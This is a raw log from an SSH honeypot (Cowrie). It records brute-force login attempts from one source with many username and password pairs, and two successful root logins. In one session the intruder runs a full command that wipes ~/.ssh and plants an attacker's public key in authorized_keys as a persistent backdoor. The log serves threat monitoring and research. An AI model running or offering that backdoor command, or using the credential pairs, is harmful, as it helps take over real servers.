{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:54.989812Z","src_ip":"212.227.235.229","session":"4ed422167cf5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:05:56.272627Z","src_ip":"212.227.235.229","session":"4ed422167cf5"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:56.583984Z","src_ip":"212.227.235.229","session":"ed7d2e99c1ea"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:56.585190Z","src_ip":"212.227.235.229","session":"4ed422167cf5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33352,"dst_ip":"1.2.3.4","dst_port":22,"session":"93f12511613b","protocol":"ssh","message":"New connection: 212.227.235.229:33352 (1.2.3.4:22) [session: 93f12511613b]","sensor":"my-vps","timestamp":"2025-09-08T23:06:08.261961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:06:08.289063Z","src_ip":"212.227.235.229","session":"93f12511613b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:06:08.546582Z","src_ip":"212.227.235.229","session":"93f12511613b"}
{"eventid":"cowrie.login.failed","username":"ftpadmin","password":"1234567890","message":"login attempt [ftpadmin/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T23:06:09.538876Z","src_ip":"212.227.235.229","session":"93f12511613b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:10.775656Z","src_ip":"212.227.235.229","session":"93f12511613b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45672,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fd85a8d1200","protocol":"ssh","message":"New connection: 212.227.235.229:45672 (1.2.3.4:22) [session: 9fd85a8d1200]","sensor":"my-vps","timestamp":"2025-09-08T23:06:12.208820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:06:12.209541Z","src_ip":"212.227.235.229","session":"9fd85a8d1200"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:06:12.538368Z","src_ip":"212.227.235.229","session":"9fd85a8d1200"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"changeme","message":"login attempt [weblogic/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T23:06:13.892798Z","src_ip":"212.227.235.229","session":"9fd85a8d1200"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:15.223940Z","src_ip":"212.227.235.229","session":"9fd85a8d1200"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36632,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a41083927ee","protocol":"ssh","message":"New connection: 212.227.235.229:36632 (1.2.3.4:22) [session: 3a41083927ee]","sensor":"my-vps","timestamp":"2025-09-08T23:06:18.126941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:06:18.128551Z","src_ip":"212.227.235.229","session":"3a41083927ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:06:18.445061Z","src_ip":"212.227.235.229","session":"3a41083927ee"}
{"eventid":"cowrie.login.success","username":"root","password":"Z1x3c5v7","message":"login attempt [root/Z1x3c5v7] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:06:19.759737Z","src_ip":"212.227.235.229","session":"3a41083927ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:06:20.445213Z","src_ip":"212.227.235.229","session":"3a41083927ee"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:06:20.445971Z","src_ip":"212.227.235.229","session":"3a41083927ee"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:06:20.447471Z","src_ip":"212.227.235.229","session":"3a41083927ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:21.136323Z","src_ip":"212.227.235.229","session":"3a41083927ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:06:21.785361Z","src_ip":"212.227.235.229","session":"3a41083927ee"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:06:21.786024Z","src_ip":"212.227.235.229","session":"3a41083927ee"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:06:22.109029Z","src_ip":"212.227.235.229","session":"3a41083927ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:22.109988Z","src_ip":"212.227.235.229","session":"3a41083927ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36636,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1b8c07ebfe7","protocol":"ssh","message":"New connection: 212.227.235.229:36636 (1.2.3.4:22) [session: c1b8c07ebfe7]","sensor":"my-vps","timestamp":"2025-09-08T23:06:22.404118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:06:22.405035Z","src_ip":"212.227.235.229","session":"c1b8c07ebfe7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:06:22.711616Z","src_ip":"212.227.235.229","session":"c1b8c07ebfe7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:06:23.988363Z","src_ip":"212.227.235.229","session":"c1b8c07ebfe7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48090,"dst_ip":"1.2.3.4","dst_port":22,"session":"af220af66f62","protocol":"ssh","message":"New connection: 212.227.235.229:48090 (1.2.3.4:22) [session: af220af66f62]","sensor":"my-vps","timestamp":"2025-09-08T23:06:24.792567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:06:24.795465Z","src_ip":"212.227.235.229","session":"af220af66f62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:06:24.890370Z","src_ip":"212.227.235.229","session":"af220af66f62"}
{"eventid":"cowrie.login.failed","username":"build","password":"123","message":"login attempt [build/123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:06:25.273986Z","src_ip":"212.227.235.229","session":"af220af66f62"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:25.299921Z","src_ip":"212.227.235.229","session":"c1b8c07ebfe7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41864,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7a45cd95912","protocol":"ssh","message":"New connection: 212.227.235.229:41864 (1.2.3.4:22) [session: e7a45cd95912]","sensor":"my-vps","timestamp":"2025-09-08T23:06:25.621197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:06:25.622549Z","src_ip":"212.227.235.229","session":"e7a45cd95912"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:06:25.936599Z","src_ip":"212.227.235.229","session":"e7a45cd95912"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:26.376621Z","src_ip":"212.227.235.229","session":"af220af66f62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35072,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcfb3863f9bf","protocol":"ssh","message":"New connection: 212.227.235.229:35072 (1.2.3.4:22) [session: bcfb3863f9bf]","sensor":"my-vps","timestamp":"2025-09-08T23:06:26.667356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:06:26.668277Z","src_ip":"212.227.235.229","session":"bcfb3863f9bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:06:26.767578Z","src_ip":"212.227.235.229","session":"bcfb3863f9bf"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"vpn1234","message":"login attempt [vpn/vpn1234] failed","sensor":"my-vps","timestamp":"2025-09-08T23:06:27.208129Z","src_ip":"212.227.235.229","session":"bcfb3863f9bf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:06:27.239397Z","src_ip":"212.227.235.229","session":"e7a45cd95912"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:27.790895Z","src_ip":"212.227.235.229","session":"e7a45cd95912"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:27.797761Z","src_ip":"212.227.235.229","session":"3a41083927ee"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:06:28.309201Z","src_ip":"212.227.235.229","session":"bcfb3863f9bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55658,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d1d2f401d95","protocol":"ssh","message":"New connection: 212.227.235.229:55658 (1.2.3.4:22) [session: 6d1d2f401d95]","sensor":"my-vps","timestamp":"2025-09-08T23:06:43.725585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:06:43.726465Z","src_ip":"212.227.235.229","session":"6d1d2f401d95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:06:43.871764Z","src_ip":"212.227.235.229","session":"6d1d2f401d95"}
{"eventid":"cowrie.login.failed","username":"miner","password":"miner","message":"login attempt [miner/miner] failed","sensor":"my-vps","timestamp":"2025-09-08T23:06:44.471262Z","src_ip":"212.227.235.229","session":"6d1d2f401d95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39026,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cd7d3771547","protocol":"ssh","message":"New connection: 212.227.235.229:39026 (1.2.3.4:22) [session: 0cd7d3771547]","sensor":"my-vps","timestamp":"2025-09-08T23:06:45.484764Z"}
